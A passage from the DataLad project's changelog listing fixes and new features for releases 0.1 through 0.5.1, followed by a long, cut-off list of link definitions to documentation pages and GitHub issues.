interface\n- Web frontend got proper coloring for the breadcrumbs and some additional\n caching to speed up interactions. See http://datasets.datalad.org\n- Small improvements to the online documentation. See e.g.\n [summary of differences between git/git-annex/datalad](http://docs.datalad.org/en/latest/related.html#git-git-annex-datalad)\n\n# 0.5.1 (Mar 25, 2017) -- cannot stop the progress\n\nA bugfix release\n\n## Fixes\n\n- [add][] was forcing addition of files to annex regardless of settings\n in `.gitattributes`. Now that decision is left to annex by default\n- `tools/testing/run_doc_examples` used to run\n doc examples as tests, fixed up to provide status per each example\n and not fail at once\n- `doc/examples`\n - [3rdparty_analysis_workflow.sh](http://docs.datalad.org/en/latest/generated/examples/3rdparty_analysis_workflow.html)\n was fixed up to reflect changes in the API of 0.5.0.\n- progress bars\n - should no longer crash **datalad** and report correct sizes and speeds\n - should provide progress reports while using Python 3.x\n\n## Enhancements and new features\n\n- `doc/examples`\n - [nipype_workshop_dataset.sh](http://docs.datalad.org/en/latest/generated/examples/nipype_workshop_dataset.html)\n new example to demonstrate how new super- and sub- datasets were established\n as a part of our datasets collection\n\n\n# 0.5.0 (Mar 20, 2017) -- it's huge\n\nThis release includes an avalanche of bug fixes, enhancements, and\nadditions which at large should stay consistent with previous behavior\nbut provide better functioning. Lots of code was refactored to provide\nmore consistent code-base, and some API breakage has happened. Further\nwork is ongoing to standardize output and results reporting\n([#1350][])\n\n## Most notable changes\n\n- requires [git-annex][] >= 6.20161210 (or better even >= 6.20161210 for\n improved functionality)\n- commands should now operate on paths specified (if any), without\n causing side-effects on other dirty/staged files\n- [save][]\n - `-a` is deprecated in favor of `-u` or `--all-updates`\n so only changes known components get saved, and no new files\n automagically added\n - `-S` does no longer store the originating dataset in its commit\n message\n- [add][]\n - can specify commit/save message with `-m`\n- [add-sibling][] and [create-sibling][]\n - now take the name of the sibling (remote) as a `-s` (`--name`)\n option, not a positional argument\n - `--publish-depends` to setup publishing data and code to multiple\n repositories (e.g. github + webserve) should now be functional\n see [this comment](https://github.com/datalad/datalad/issues/335#issuecomment-277240733)\n - got `--publish-by-default` to specify what refs should be published\n by default\n - got `--annex-wanted`, `--annex-groupwanted` and `--annex-group`\n settings which would be used to instruct annex about preferred\n content. [publish][] then will publish data using those settings if\n `wanted` is set.\n - got `--inherit` option to automagically figure out url/wanted and\n other git/annex settings for new remote sub-dataset to be constructed\n- [publish][]\n - got `--skip-failing` refactored into `--missing` option\n which could use new feature of [create-sibling][] `--inherit`\n\n## Fixes\n\n- More consistent interaction through ssh - all ssh connections go\n through [sshrun][] shim for a \"single point of authentication\", etc.\n- More robust [ls][] operation outside of the datasets\n- A number of fixes for direct and v6 mode of annex\n\n## Enhancements and new features\n\n- New [drop][] and [remove][] commands\n- [clean][]\n - got `--what` to specify explicitly what cleaning steps to perform\n and now could be invoked with `-r`\n- `datalad` and `git-annex-remote*` scripts now do not use setuptools\n entry points mechanism and rely on simple import to shorten start up time\n- [Dataset][] is also now using [Flyweight pattern][], so the same instance is\n reused for the same dataset\n- progressbars should not add more empty lines\n\n## Internal refactoring\n\n- Majority of the commands now go through `_prep` for arguments validation\n and pre-processing to avoid recursive invocations\n\n\n# 0.4.1 (Nov 10, 2016) -- CA release\n\nRequires now GitPython >= 2.1.0\n\n## Fixes\n\n- [save][]\n - to not save staged files if explicit paths were provided\n- improved (but not yet complete) support for direct mode\n- [update][] to not crash if some sub-datasets are not installed\n- do not log calls to `git config` to avoid leakage of possibly \n sensitive settings to the logs\n\n## Enhancements and new features\n\n- New [rfc822-compliant metadata][] format\n- [save][]\n - -S to save the change also within all super-datasets\n- [add][] now has progress-bar reporting\n- [create-sibling-github][] to create a :term:`sibling` of a dataset on\n github\n- [OpenfMRI][] crawler and datasets were enriched with URLs to separate\n files where also available from openfmri s3 bucket\n (if upgrading your datalad datasets, you might need to run\n `git annex enableremote datalad` to make them available)\n- various enhancements to log messages\n- web interface\n - populates \"install\" box first thus making UX better over slower\n connections\n\n\n# 0.4 (Oct 22, 2016) -- Paris is waiting\n\nPrimarily it is a bugfix release but because of significant refactoring\nof the [install][] and [get][] implementation, it gets a new minor release. \n\n## Fixes\n\n- be able to [get][] or [install][] while providing paths while being \n outside of a dataset\n- remote annex datasets get properly initialized\n- robust detection of outdated [git-annex][]\n\n## Enhancements and new features\n\n- interface changes\n - [get][] `--recursion-limit=existing` to not recurse into not-installed\n subdatasets\n - [get][] `-n` to possibly install sub-datasets without getting any data\n - [install][] `--jobs|-J` to specify number of parallel jobs for annex \n [get][] call could use (ATM would not work when data comes from archives)\n- more (unit-)testing\n- documentation: see http://docs.datalad.org/en/latest/basics.html\n for basic principles and useful shortcuts in referring to datasets\n- various webface improvements: breadcrumb paths, instructions how\n to install dataset, show version from the tags, etc.\n\n# 0.3.1 (Oct 1, 2016) -- what a wonderful week\n\nPrimarily bugfixes but also a number of enhancements and core\nrefactorings\n\n## Fixes\n\n- do not build manpages and examples during installation to avoid\n problems with possibly previously outdated dependencies\n- [install][] can be called on already installed dataset (with `-r` or\n `-g`)\n\n## Enhancements and new features\n\n- complete overhaul of datalad configuration settings handling\n (see [Configuration documentation][]), so majority of the environment.\n Now uses git format and stores persistent configuration settings under\n `.datalad/config` and local within `.git/config`\n variables we have used were renamed to match configuration names\n- [create-sibling][] does not now by default upload web front-end\n- [export][] command with a plug-in interface and `tarball` plugin to export\n datasets\n- in Python, `.api` functions with rendering of results in command line\n got a _-suffixed sibling, which would render results as well in Python\n as well (e.g., using `search_` instead of `search` would also render\n results, not only output them back as Python objects)\n- [get][]\n - `--jobs` option (passed to `annex get`) for parallel downloads\n - total and per-download (with git-annex >= 6.20160923) progress bars\n (note that if content is to be obtained from an archive, no progress\n will be reported yet)\n- [install][] `--reckless` mode option\n- [search][]\n - highlights locations and fieldmaps for better readability\n - supports `-d^` or `-d///` to point to top-most or centrally\n installed meta-datasets\n - \"complete\" paths to the datasets are reported now\n - `-s` option to specify which fields (only) to search\n- various enhancements and small fixes to [meta-data][] handling, [ls][],\n custom remotes, code-base formatting, downloaders, etc\n- completely switched to `tqdm` library (`progressbar` is no longer\n used/supported)\n\n\n# 0.3 (Sep 23, 2016) -- winter is coming\n\nLots of everything, including but not limited to\n\n- enhanced index viewer, as the one on http://datasets.datalad.org\n- initial new data providers support: [Kaggle][], [BALSA][], [NDA][], [NITRC][]\n- initial [meta-data support and management][]\n- new and/or improved crawler pipelines for [BALSA][], [CRCNS][], [OpenfMRI][]\n- refactored [install][] command, now with separate [get][]\n- some other commands renaming/refactoring (e.g., [create-sibling][])\n- datalad [search][] would give you an option to install datalad's \n super-dataset under ~/datalad if ran outside of a dataset\n\n## 0.2.3 (Jun 28, 2016) -- busy OHBM\n\nNew features and bugfix release\n\n- support of /// urls to point to http://datasets.datalad.org\n- variety of fixes and enhancements throughout\n\n## 0.2.2 (Jun 20, 2016) -- OHBM we are coming!\n\nNew feature and bugfix release\n\n- greately improved documentation\n- publish command API RFing allows for custom options to annex, and uses\n --to REMOTE for consistent with annex invocation\n- variety of fixes and enhancements throughout\n\n## 0.2.1 (Jun 10, 2016)\n\n- variety of fixes and enhancements throughout\n\n# 0.2 (May 20, 2016)\n\nMajor RFing to switch from relying on rdf to git native submodules etc\n\n# 0.1 (Oct 14, 2015)\n\nRelease primarily focusing on interface functionality including initial\npublishing\n\n[git-annex]: http://git-annex.branchable.com/\n[gx-sameas]: https://git-annex.branchable.com/tips/multiple_remotes_accessing_the_same_data_store/\n[duecredit]: https://github.com/duecredit/duecredit\n\n[Kaggle]: https://www.kaggle.com\n[BALSA]: http://balsa.wustl.edu\n[NDA]: http://data-archive.nimh.nih.gov\n[NITRC]: https://www.nitrc.org\n[CRCNS]: http://crcns.org\n[FCON1000]: http://fcon_1000.projects.nitrc.org\n[OpenfMRI]: http://openfmri.org\n\n[Configuration documentation]: http://docs.datalad.org/config.html\n\n[Dataset]: http://docs.datalad.org/en/latest/generated/datalad.api.Dataset.html\n[Sibling]: http://docs.datalad.org/en/latest/glossary.html\n\n[rfc822-compliant metadata]: http://docs.datalad.org/en/latest/metadata.html#rfc822-compliant-meta-data\n[meta-data support and management]: http://docs.datalad.org/en/latest/cmdline.html#meta-data-handling\n[meta-data]: http://docs.datalad.org/en/latest/cmdline.html#meta-data-handling\n\n[add-archive-content]: https://datalad.readthedocs.io/en/latest/generated/man/datalad-add-archive-content.html\n[add-sibling]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-add-sibling.html\n[add]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-add.html\n[addurls]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-addurls.html\n[annotate-paths]: http://docs.datalad.org/en/latest/generated/man/datalad-annotate-paths.html\n[clean]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-clean.html\n[clone]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-clone.html\n[config]: http://docs.datalad.org/en/latest/config.html\n[configuration]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-configuration.html\n[copy-file]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-copy-file.html\n[copy_to]: http://docs.datalad.org/en/latest/_modules/datalad/support/annexrepo.html?highlight=%22copy_to%22\n[create]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-create.html\n[create-sibling-github]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-github.html\n[create-sibling-ria]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling-ria.html\n[create-sibling]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-create-sibling.html\n[datalad]: http://docs.datalad.org/en/latest/generated/man/datalad.html\n[datalad-container]: https://github.com/datalad/datalad-container\n[datalad-revolution]: http://github.com/datalad/datalad-revolution\n[download-url]: https://datalad.readthedocs.io/en/latest/generated/man/datalad-download-url.html\n[diff]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-diff.html\n[drop]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-drop.html\n[export-archive-ora]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-export-archive-ora.html\n[export]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-export.html\n[export_tarball]: http://docs.datalad.org/en/latest/generated/datalad.plugin.export_tarball.html\n[get]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-get.html\n[install]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-install.html\n[ls]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-ls.html\n[metadata]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-metadata.html\n[nd_freeze]: https://github.com/neurodebian/neurodebian/blob/master/tools/nd_freeze\n[plugin]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-plugin.html\n[publications]: https://datalad.readthedocs.io/en/latest/publications.html\n[publish]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-publish.html\n[push]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-push.html\n[remove]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-remove.html\n[rerun]: https://datalad.readthedocs.io/en/latest/generated/man/datalad-rerun.html\n[run]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-run.html\n[run-procedure]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-run-procedure.html\n[save]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-save.html\n[search]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-search.html\n[siblings]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-siblings.html\n[sshrun]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-sshrun.html\n[status]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-status.html\n[subdatasets]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-subdatasets.html\n[unlock]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-unlock.html\n[update]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-update.html\n[wtf]: http://datalad.readthedocs.io/en/latest/generated/man/datalad-wtf.html\n\n[handbook]: http://handbook.datalad.org\n[handbook-scalable-datastore]: http://handbook.datalad.org/en/latest/usecases/datastorage_for_institutions.html\n[hooks]: http://handbook.datalad.org/en/latest/basics/101-145-hooks.html\n[Flyweight pattern]: https://en.wikipedia.org/wiki/Flyweight_pattern\n[NO_COLOR]: https://no-color.org/\n\n[#5420]: https://github.com/datalad/datalad/issues/5420\n[#5428]: https://github.com/datalad/datalad/issues/5428\n[#5459]: https://github.com/datalad/datalad/issues/5459\n[#5554]: https://github.com/datalad/datalad/issues/5554\n[#5564]: https://github.com/datalad/datalad/issues/5564\n[#5672]: https://github.com/datalad/datalad/issues/5672\n[#1350]: https://github.com/datalad/datalad/issues/1350\n[#1651]: https://github.com/datalad/datalad/issues/1651\n[#2534]: https://github.com/datalad/datalad/issues/2534\n[#2566]: https://github.com/datalad/datalad/issues/2566\n[#2692]: https://github.com/datalad/datalad/issues/2692\n[#2702]: https://github.com/datalad/datalad/issues/2702\n[#2703]: https://github.com/datalad/datalad/issues/2703\n[#2707]: https://github.com/datalad/datalad/issues/2707\n[#2708]: https://github.com/datalad/datalad/issues/2708\n[#2710]: https://github.com/datalad/datalad/issues/2710\n[#2712]: https://github.com/datalad/datalad/issues/2712\n[#2717]: https://github.com/datalad/datalad/issues/2717\n[#2722]: https://github.com/datalad/datalad/issues/2722\n[#2723]: https://github.com/datalad/datalad/issues/2723\n[#2724]: https://github.com/datalad/datalad/issues/2724\n[#2725]: https://github.com/datalad/datalad/issues/2725\n[#2728]: https://github.com/datalad/datalad/issues/2728\n[#2731]: https://github.com/datalad/datalad/issues/2731\n[#2733]: https://github.com/datalad/datalad/issues/2733\n[#2735]: https://github.com/datalad/datalad/issues/2735\n[#2738]: https://github.com/datalad/datalad/issues/2738\n[#2741]: https://github.com/datalad/datalad/issues/2741\n[#2744]: https://github.com/datalad/datalad/issues/2744\n[#2752]: https://github.com/datalad/datalad/issues/2752\n[#2754]: https://github.com/datalad/datalad/issues/2754\n[#2761]: https://github.com/datalad/datalad/issues/2761\n[#2770]: https://github.com/datalad/datalad/issues/2770\n[#2773]: https://github.com/datalad/datalad/issues/2773\n[#2777]: https://github.com/datalad/datalad/issues/2777\n[#2788]: https://github.com/datalad/datalad/issues/2788\n[#2794]: https://github.com/datalad/datalad/issues/2794\n[#2795]: https://github.com/datalad/datalad/issues/2795\n[#2796]: https://github.com/datalad/datalad/issues/2796\n[#2798]: https://github.com/datalad/datalad/issues/2798\n[#2815]: https://github.com/datalad/datalad/issues/2815\n[#2835]: https://github.com/datalad/datalad/issues/2835\n[#2858]: https://github.com/datalad/datalad/issues/2858\n[#2859]: https://github.com/datalad/datalad/issues/2859\n[#2860]: https://github.com/datalad/datalad/issues/2860\n[#2861]: https://github.com/datalad/datalad/issues/2861\n[#2864]: https://github.com/datalad/datalad/issues/2864\n[#2865]: https://github.com/datalad/datalad/issues/2865\n[#2876]: https://github.com/datalad/datalad/issues/2876\n[#2878]: https://github.com/datalad/datalad/issues/2878\n[#2881]: https://github.com/datalad/datalad/issues/2881\n[#2886]: https://github.com/datalad/datalad/issues/2886\n[#2891]: https://github.com/datalad/datalad/issues/2891\n[#2892]: https://github.com/datalad/datalad/issues/2892\n[#2893]: https://github.com/datalad/datalad/issues/2893\n[#2894]: https://github.com/datalad/datalad/issues/2894\n[#2897]: https://github.com/datalad/datalad/issues/2897\n[#2900]: https://github.com/datalad/datalad/issues/2900\n[#2901]: https://github.com/datalad/datalad/issues/2901\n[#2902]: https://github.com/datalad/datalad/issues/2902\n[#2903]: https://github.com/datalad/datalad/issues/2903\n[#2904]: https://github.com/datalad/datalad/issues/2904\n[#2905]: https://github.com/datalad/datalad/issues/2905\n[#2909]: https://github.com/datalad/datalad/issues/2909\n[#2912]: https://github.com/datalad/datalad/issues/2912\n[#2914]: https://github.com/datalad/datalad/issues/2914\n[#2917]: https://github.com/datalad/datalad/issues/2917\n[#2918]: https://github.com/datalad/datalad/issues/2918\n[#2921]: https://github.com/datalad/datalad/issues/2921\n[#2922]: https://github.com/datalad/datalad/issues/2922\n[#2937]: https://github.com/datalad/datalad/issues/2937\n[#2946]: https://github.com/datalad/datalad/issues/2946\n[#2950]: https://github.com/datalad/datalad/issues/2950\n[#2952]: https://github.com/datalad/datalad/issues/2952\n[#2954]: https://github.com/datalad/datalad/issues/2954\n[#2958]: https://github.com/datalad/datalad/issues/2958\n[#2960]: https://github.com/datalad/datalad/issues/2960\n[#2972]: https://github.com/datalad/datalad/issues/2972\n[#2974]: https://github.com/datalad/datalad/issues/2974\n[#2982]: https://github.com/datalad/datalad/issues/2982\n[#2984]: https://github.com/datalad/datalad/issues/2984\n[#2991]: https://github.com/datalad/datalad/issues/2991\n[#2993]: https://github.com/datalad/datalad/issues/2993\n[#2995]: https://github.com/datalad/datalad/issues/2995\n[#3001]: https://github.com/datalad/datalad/issues/3001\n[#3002]: https://github.com/datalad/datalad/issues/3002\n[#3007]: https://github.com/datalad/datalad/issues/3007\n[#3009]: https://github.com/datalad/datalad/issues/3009\n[#3019]: https://github.com/datalad/datalad/issues/3019\n[#3025]: https://github.com/datalad/datalad/issues/3025\n[#3029]: https://github.com/datalad/datalad/issues/3029\n[#3035]: https://github.com/datalad/datalad/issues/3035\n[#3037]: https://github.com/datalad/datalad/issues/3037\n[#3038]: https://github.com/datalad/datalad/issues/3038\n[#3046]: https://github.com/datalad/datalad/issues/3046\n[#3049]: https://github.com/datalad/datalad/issues/3049\n[#3051]: https://github.com/datalad/datalad/issues/3051\n[#3057]: https://github.com/datalad/datalad/issues/3057\n[#3058]: https://github.com/datalad/datalad/issues/3058\n[#3061]: https://github.com/datalad/datalad/issues/3061\n[#3065]: https://github.com/datalad/datalad/issues/3065\n[#3066]: https://github.com/datalad/datalad/issues/3066\n[#3080]: https://github.com/datalad/datalad/issues/3080\n[#3089]: https://github.com/datalad/datalad/issues/3089\n[#3091]: https://github.com/datalad/datalad/issues/3091\n[#3098]: https://github.com/datalad/datalad/issues/3098\n[#3099]: https://github.com/datalad/datalad/issues/3099\n[#3102]: https://github.com/datalad/datalad/issues/3102\n[#3104]: https://github.com/datalad/datalad/issues/3104\n[#3106]: https://github.com/datalad/datalad/issues/3106\n[#3109]: https://github.com/datalad/datalad/issues/3109\n[#3115]: https://github.com/datalad/datalad/issues/3115\n[#3119]: https://github.com/datalad/datalad/issues/3119\n[#3124]: https://github.com/datalad/datalad/issues/3124\n[#3129]: https://github.com/datalad/datalad/issues/3129\n[#3137]: https://github.com/datalad/datalad/issues/3137\n[#3138]: https://github.com/datalad/datalad/issues/3138\n[#3141]: https://github.com/datalad/datalad/issues/3141\n[#3146]: https://github.com/datalad/datalad/issues/3146\n[#3149]: https://github.com/datalad/datalad/issues/3149\n[#3156]: https://github.com/datalad/datalad/issues/3156\n[#3164]: https://github.com/datalad/datalad/issues/3164\n[#3165]: https://github.com/datalad/datalad/issues/3165\n[#3168]: https://github.com/datalad/datalad/issues/3168\n[#3176]: https://github.com/datalad/datalad/issues/3176\n[#3180]: https://github.com/datalad/datalad/issues/3180\n[#3181]: https://github.com/datalad/datalad/issues/3181\n[#3184]: https://github.com/datalad/datalad/issues/3184\n[#3186]: https://github.com/datalad/datalad/issues/3186\n[#3196]: https://github.com/datalad/datalad/issues/3196\n[#3205]: https://github.com/datalad/datalad/issues/3205\n[#3210]: https://github.com/datalad/datalad/issues/3210\n[#3211]: https://github.com/datalad/datalad/issues/3211\n[#3215]: https://github.com/datalad/datalad/issues/3215\n[#3220]: https://github.com/datalad/datalad/issues/3220\n[#3222]: https://github.com/datalad/datalad/issues/3222\n[#3223]: https://github.com/datalad/datalad/issues/3223\n[#3238]: https://github.com/datalad/datalad/issues/3238\n[#3241]: https://github.com/datalad/datalad/issues/3241\n[#3242]: https://github.com/datalad/datalad/issues/3242\n[#3249]: https://github.com/datalad/datalad/issues/3249\n[#3250]: https://github.com/datalad/datalad/issues/3250\n[#3255]: https://github.com/datalad/datalad/issues/3255\n[#3258]: https://github.com/datalad/datalad/issues/3258\n[#3259]: https://github.com/datalad/datalad/issues/3259\n[#3268]: https://github.com/datalad/datalad/issues/3268\n[#3274]: https://github.com/datalad/datalad/issues/3274\n[#3281]: https://github.com/datalad/datalad/issues/3281\n[#3288]: https://github.com/datalad/datalad/issues/3288\n[#3289]: https://github.com/datalad/datalad/issues/3289\n[#3294]: https://github.com/datalad/datalad/issues/3294\n[#3298]: https://github.com/datalad/datalad/issues/3298\n[#3299]: https://github.com/datalad/datalad/issues/3299\n[#3301]: https://github.com/datalad/datalad/issues/3301\n[#3304]: https://github.com/datalad/datalad/issues/3304\n[#3314]: https://github.com/datalad/datalad/issues/3314\n[#3318]: https://github.com/datalad/datalad/issues/3318\n[#3322]: https://github.com/datalad/datalad/issues/3322\n[#3324]: https://github.com/datalad/datalad/issues/3324\n[#3325]: https://github.com/datalad/datalad/issues/3325\n[#3326]: https://github.com/datalad/datalad/issues/3326\n[#3329]: https://github.com/datalad/datalad/issues/3329\n[#3330]: https://github.com/datalad/datalad/issues/3330\n[#3332]: https://github.com/datalad/datalad/issues/3332\n[#3334]: https://github.com/datalad/datalad/issues/3334\n[#3336]: https://github.com/datalad/datalad/issues/3336\n[#3340]: https://github.com/datalad/datalad/issues/3340\n[#3343]: https://github.com/datalad/datalad/issues/3343\n[#3347]: https://github.com/datalad/datalad/issues/3347\n[#3353]: https://github.com/datalad/datalad/issues/3353\n[#3362]: https://github.com/datalad/datalad/issues/3362\n[#3364]: https://github.com/datalad/datalad/issues/3364\n[#3365]: https://github.com/datalad/datalad/issues/3365\n[#3366]: https://github.com/datalad/datalad/issues/3366\n[#3374]: https://github.com/datalad/datalad/issues/3374\n[#3378]: https://github.com/datalad/datalad/issues/3378\n[#3383]: https://github.com/datalad/datalad/issues/3383\n[#3396]: https://github.com/datalad/datalad/issues/3396\n[#3398]: https://github.com/datalad/datalad/issues/3398\n[#3400]: https://github.com/datalad/datalad/issues/3400\n[#3401]: https://github.com/datalad/datalad/issues/3401\n[#3403]: https://github.com/datalad/datalad/issues/3403\n[#3407]: https://github.com/datalad/datalad/issues/3407\n[#3425]: https://github.com/datalad/datalad/issues/3425\n[#3429]: https://github.com/datalad/datalad/issues/3429\n[#3435]: https://github.com/datalad/datalad/issues/3435\n[#3439]: https://github.com/datalad/datalad/issues/3439\n[#3440]: https://github.com/datalad/datalad/issues/3440\n[#3444]: https://github.com/datalad/datalad/issues/3444\n[#3447]: https://github.com/datalad/datalad/issues/3447\n[#3458]: https://github.com/datalad/datalad/issues/3458\n[#3459]: https://github.com/datalad/datalad/issues/3459\n[#3460]: https://github.com/datalad/datalad/issues/3460\n[#3470]: https://github.com/datalad/datalad/issues/3470\n[#3475]: https://github.com/datalad/datalad/issues/3475\n[#3476]: https://github.com/datalad/datalad/issues/3476\n[#3479]: https://github.com/datalad/datalad/issues/3479\n[#3492]: https://github.com/datalad/datalad/issues/3492\n[#3493]: https://github.com/datalad/datalad/issues/3493\n[#3498]: https://github.com/datalad/datalad/issues/3498\n[#3499]: https://github.com/datalad/datalad/issues/3499\n[#3508]: https://github.com/datalad/datalad/issues/3508\n[#3516]: https://github.com/datalad/datalad/issues/3516\n[#3518]: https://github.com/datalad/datalad/issues/3518\n[#3524]: https://github.com/datalad/datalad/issues/3524\n[#3525]: https://github.com/datalad/datalad/issues/3525\n[#3527]: https://github.com/datalad/datalad/issues/3527\n[#3531]: https://github.com/datalad/datalad/issues/3531\n[#3534]: https://github.com/datalad/datalad/issues/3534\n[#3538]: https://github.com/datalad/datalad/issues/3538\n[#3546]: https://github.com/datalad/datalad/issues/3546\n[#3547]: https://github.com/datalad/datalad/issues/3547\n[#3552]: https://github.com/datalad/datalad/issues/3552\n[#3555]: https://github.com/datalad/datalad/issues/3555\n[#3561]: https://github.com/datalad/datalad/issues/3561\n[#3562]: https://github.com/datalad/datalad/issues/3562\n[#3570]: https://github.com/datalad/datalad/issues/3570\n[#3574]: https://github.com/datalad/datalad/issues/3574\n[#3576]: https://github.com/datalad/datalad/issues/3576\n[#3579]: https://github.com/datalad/datalad/issues/3579\n[#3582]: https://github.com/datalad/datalad/issues/3582\n[#3586]: https://github.com/datalad/datalad/issues/3586\n[#3587]: https://github.com/datalad/datalad/issues/3587\n[#3591]: https://github.com/datalad/datalad/issues/3591\n[#3594]: https://github.com/datalad/datalad/issues/3594\n[#3597]: https://github.com/datalad/datalad/issues/3597\n[#3600]: https://github.com/datalad/datalad/issues/3600\n[#3602]: https://github.com/datalad/datalad/issues/3602\n[#3616]: https://github.com/datalad/datalad/issues/3616\n[#3622]: https://github.com/datalad/datalad/issues/3622\n[#3624]: https://github.com/datalad/datalad/issues/3624\n[#3626]: https://github.com/datalad/datalad/issues/3626\n[#3629]: https://github.com/datalad/datalad/issues/3629\n[#3631]: https://github.com/datalad/datalad/issues/3631\n[#3646]: https://github.com/datalad/datalad/issues/3646\n[#3648]: https://github.com/datalad/datalad/issues/3648\n[#3656]: https://github.com/datalad/datalad/issues/3656\n[#3667]: https://github.com/datalad/datalad/issues/3667\n[#3678]: https://github.com/datalad/datalad/issues/3678\n[#3680]: https://github.com/datalad/datalad/issues/3680\n[#3682]: https://github.com/datalad/datalad/issues/3682\n[#3688]: https://github.com/datalad/datalad/issues/3688\n[#3692]: https://github.com/datalad/datalad/issues/3692\n[#3693]: https://github.com/datalad/datalad/issues/3693\n[#3695]: https://github.com/datalad/datalad/issues/3695\n[#3700]: https://github.com/datalad/datalad/issues/3700\n[#3701]: https://github.com/datalad/datalad/issues/3701\n[#3702]: https://github.com/datalad/datalad/issues/3702\n[#3704]: https://github.com/datalad/datalad/issues/3704\n[#3705]: https://github.com/datalad/datalad/issues/3705\n[#3712]: https://github.com/datalad/datalad/issues/3712\n[#3715]: https://github.com/datalad/datalad/issues/3715\n[#3719]: https://github.com/datalad/datalad/issues/3719\n[#3728]: https://github.com/datalad/datalad/issues/3728\n[#3743]: https://github.com/datalad/datalad/issues/3743\n[#3746]: https://github.com/datalad/datalad/issues/3746\n[#3747]: https://github.com/datalad/datalad/issues/3747\n[#3749]: https://github.com/datalad/datalad/issues/3749\n[#3751]: https://github.com/datalad/datalad/issues/3751\n[#3754]: https://github.com/datalad/datalad/issues/3754\n[#3761]: https://github.com/datalad/datalad/issues/3761\n[#3765]: https://github.com/datalad/datalad/issues/3765\n[#3768]: https://github.com/datalad/datalad/issues/3768\n[#3769]: https://github.com/datalad/datalad/issues/3769\n[#3770]: https://github.com/datalad/datalad/issues/3770\n[#3772]: https://github.com/datalad/datalad/issues/3772\n[#3775]: https://github.com/datalad/datalad/issues/3775\n[#3776]: https://github.com/datalad/datalad/issues/3776\n[#3777]: https://github.com/datalad/datalad/issues/3777\n[#3780]: https://github.com/datalad/datalad/issues/3780\n[#3787]: https://github.com/datalad/datalad/issues/3787\n[#3791]: https://github.com/datalad/datalad/issues/3791\n[#3793]: https://github.com/datalad/datalad/issues/3793\n[#3794]: https://github.com/datalad/datalad/issues/3794\n[#3797]: https://github.com/datalad/datalad/issues/3797\n[#3798]: https://github.com/datalad/datalad/issues/3798\n[#3799]: https://github.com/datalad/datalad/issues/3799\n[#3803]: https://github.com/datalad/datalad/issues/3803\n[#3804]: https://github.com/datalad/datalad/issues/3804\n[#3807]: https://github.com/datalad/datalad/issues/3807\n[#3812]: https://github.com/datalad/datalad/issues/3812\n[#3815]: https://github.com/datalad/datalad/issues/3815\n[#3817]: https://github.com/datalad/datalad/issues/3817\n[#3821]: https://github.com/datalad/datalad/issues/3821\n[#3828]: https://github.com/datalad/datalad/issues/3828\n[#3831]: https://github.com/datalad/datalad/issues/3831\n[#3834]: https://github.com/datalad/datalad/issues/3834\n[#3842]: https://github.com/datalad/datalad/issues/3842\n[#3850]: https://github.com/datalad/datalad/issues/3850\n[#3851]: https://github.com/datalad/datalad/issues/3851\n[#3854]: https://github.com/datalad/datalad/issues/3854\n[#3856]: https://github.com/datalad/datalad/issues/3856\n[#3860]: https://github.com/datalad/datalad/issues/3860\n[#3862]: https://github.com/datalad/datalad/issues/3862\n[#3863]: https://github.com/datalad/datalad/issues/3863\n[#3871]: https://github.com/datalad/datalad/issues/3871\n[#3873]: https://github.com/datalad/datalad/issues/3873\n[#3877]: https://github.com/datalad/datalad/issues/3877\n[#3880]: https://github.com/datalad/datalad/issues/3880\n[#3888]: https://github.com/datalad/datalad/issues/3888\n[#3892]: https://github.com/datalad/datalad/issues/3892\n[#3903]: https://github.com/datalad/datalad/issues/3903\n[#3904]: https://github.com/datalad/datalad/issues/3904\n[#3906]: https://github.com/datalad/datalad/issues/3906\n[#3907]: https://github.com/datalad/datalad/issues/3907\n[#3911]: https://github.com/datalad/datalad/issues/3911\n[#3926]: https://github.com/datalad/datalad/issues/3926\n[#3927]: https://github.com/datalad/datalad/issues/3927\n[#3931]: https://github.com/datalad/datalad/issues/3931\n[#3935]: https://github.com/datalad/datalad/issues/3935\n[#3940]: https://github.com/datalad/datalad/issues/3940\n[#3954]: https://github.com/datalad/datalad/issues/3954\n[#3955]: https://github.com/datalad/datalad/issues/3955\n[#3958]: https://github.com/datalad/datalad/issues/3958\n[#3959]: https://github.com/datalad/datalad/issues/3959\n[#3960]: https://github.com/datalad/datalad/issues/3960\n[#3963]: https://github.com/datalad/datalad/issues/3963\n[#3970]: https://github.com/datalad/datalad/issues/3970\n[#3971]: https://github.com/datalad/datalad/issues/3971\n[#3974]: https://github.com/datalad/datalad/issues/3974\n[#3975]: https://github.com/datalad/datalad/issues/3975\n[#3976]: https://github.com/datalad/datalad/issues/3976\n[#3979]: https://github.com/datalad/datalad/issues/3979\n[#3996]: https://github.com/datalad/datalad/issues/3996\n[#3999]: https://github.com/datalad/datalad/issues/3999\n[#4002]: https://github.com/datalad/datalad/issues/4002\n[#4022]: https://github.com/datalad/datalad/issues/4022\n[#4036]: 